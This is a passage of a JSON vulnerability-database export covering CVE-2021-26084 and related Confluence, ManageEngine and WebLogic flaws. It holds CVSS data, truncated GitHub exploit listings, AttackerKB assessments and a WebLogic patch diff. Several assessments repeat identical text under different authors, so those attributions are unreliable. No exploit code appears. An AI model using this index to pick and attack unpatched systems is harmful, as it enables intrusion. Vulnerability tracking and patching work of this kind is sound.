"baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T23:33:44", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-13T08:40:52", "id": "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-04T07:34:57", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T07:37:58", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:30:10", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084"], "modified": "2021-11-23T15:51:23", "id": "CD8CABD7-BE65-5434-B682-F73ABA737C65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T04:37:44", "description": "# PocList\r\n\r\n\u81ea\u5199\u7684\u6f0f\u6d1ePOC\u548cEXP\u5408\u96c6\u3002\r\n\r\nPOC\u811a\u672c\u6307\u5b9aurl\u6587\u4ef6\u540e\uff0c\u53ef\u591a\u7ebf\u7a0b\u6279\u91cf\u626b\u63cf\u76ee\u6807\u8fdb\u884c\u9a8c\u8bc1\uff1bEXP...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-22T05:06:33", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zeroshell", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12725", "CVE-2021-26084", "CVE-2021-36749"], "modified": "2022-04-01T01:33:01", "id": "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-01-18T20:31:26", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 15, 2021 8:54am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis>).\n\n**Update:** I have confirmed that ADManager Plus was also patched against CVE-2021-40539. See the [release notes](<https://www.manageengine.com/products/ad-manager/release-notes.html>) for build 7112. This doesn\u2019t seem to affect `/RestAPI/WC` endpoints.\n\n**ccondon-r7** at November 08, 2021 3:18pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis>).\n\n**Update:** I have confirmed that ADManager Plus was also patched against CVE-2021-40539. See the [release notes](<https://www.manageengine.com/products/ad-manager/release-notes.html>) for build 7112. This doesn\u2019t seem to affect `/RestAPI/WC` endpoints.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "attackerkb", "title": "CVE-2021-40539", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-15T00:00:00", "id": "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "href": "https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-07T11:31:21", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-07-27T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T01:44:12", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG &gt; User Management &gt; User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-27T04:44:47", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14883 \u2014 Authenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14883", "CVE-2021-26084"], "modified": "2020-10-29T00:00:00", "id": "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "href": "https://attackerkb.com/topics/XrIT8vLY22/cve-2020-14883-authenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-02T17:14:41", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**wvu-r7** at November 02, 2020 10:26pm UTC reported:\n\nCVE-2020-14750 appears to be the patch bypass for [CVE-2020-14882](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server>). Please see CVE-2020-14882\u2019s [Rapid7 analysis](<https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server#rapid7-analysis>) for more information. The CVE-2020-14750 patch is reproduced below.\n \n \n --- patched1/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 13:13:28.000000000 -0600\n +++ patched2/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java\t2020-11-02 12:11:01.000000000 -0600\n @@ -2,6 +2,7 @@\n \n import com.bea.netuix.servlets.manager.SingleFileServlet;\n import java.io.IOException;\n +import java.util.List;\n import javax.servlet.ServletConfig;\n import javax.servlet.ServletException;\n import javax.servlet.ServletRequest;\n @@ -20,8 +21,6 @@\n \n private static final long serialVersionUID = 1L;\n \n - private static final String[] IllegalUrl = new String[] { \";\", \"%252E%252E\", \"%2E%2E\", \"..\", \"%3C\", \"%3E\", \"<\", \">\" };\n - \n public static void initMBean() {\n MBeanUtilsInitializer.initMBeanAsynchronously();\n }\n @@ -39,8 +38,9 @@\n if (req instanceof HttpServletRequest) {\n HttpServletRequest httpServletRequest = (HttpServletRequest)req;\n String url = httpServletRequest.getRequestURI();\n - for (int i = 0; i < IllegalUrl.length; i++) {\n - if (url.contains(IllegalUrl[i])) {\n + if (!ConsoleUtils.isUserAuthenticated(httpServletRequest))\n + throw new ServletException(\"User not authenticated.\"); \n + if (!isValidUrl(url, httpServletRequest)) {\n if (resp instanceof HttpServletResponse) {\n LOG.error(\"Invalid request URL detected. \");\n HttpServletResponse httpServletResponse = (HttpServletResponse)resp;\n @@ -49,7 +49,6 @@\n return;\n } \n } \n - } \n try {\n super.service(req, resp);\n } catch (IllegalStateException e) {\n @@ -60,4 +59,15 @@\n LOG.debug(e); \n } \n }\n + \n + private boolean isValidUrl(String url, HttpServletRequest req) {\n + String consoleContextPath = ConsoleUtils.getConsoleContextPath();\n + List<String> portalList = ConsoleUtils.getConsolePortalList();\n + for (String portal : portalList) {\n + String tmp = \"/\" + consoleContextPath + portal;\n + if (url.equals(tmp))\n + return true; \n + } \n + return false;\n + }\n }\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-02T00:00:00", "type": "attackerkb", "title": "CVE-2020-14750 \u2014 Oracle WebLogic Remote Unauthenticated Remote Code Execution (RCE) Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2021-26084"], "modified": "2020-11-19T00:00:00", "id": "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "href": "https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T18:27:50", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**elligottmc** at October 29, 2020 2:27pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**ccondon-r7** at November 01, 2020 4:19pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\n**lvarela-r7** at October 29, 2020 12:41pm UTC reported:\n\nAdjusting the attacker value and exploitability scores to reflect the data and assessment already provided by **@lvarela-r7** in this topic.\n\n<https://isc.sans.edu/forums/diary/PATCH+NOW+CVE202014882+Weblogic+Actively+Exploited+Against+Honeypots/26734/> \n<https://twitter.com/jas502n/status/1321416053050667009>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-14882 \u2014 Unauthenticated RCE in Console component of Oracle WebLogic Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-2555", "CVE-2021-26084"], "modified": "2020-12-28T00:00:00", "id": "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "href": "https://attackerkb.com/topics/sb4F8UT5zu/cve-2020-14882-unauthenticated-rce-in-console-component-of-oracle-weblogic-server", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-23T13:18:51", "description": "This Metasploit module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 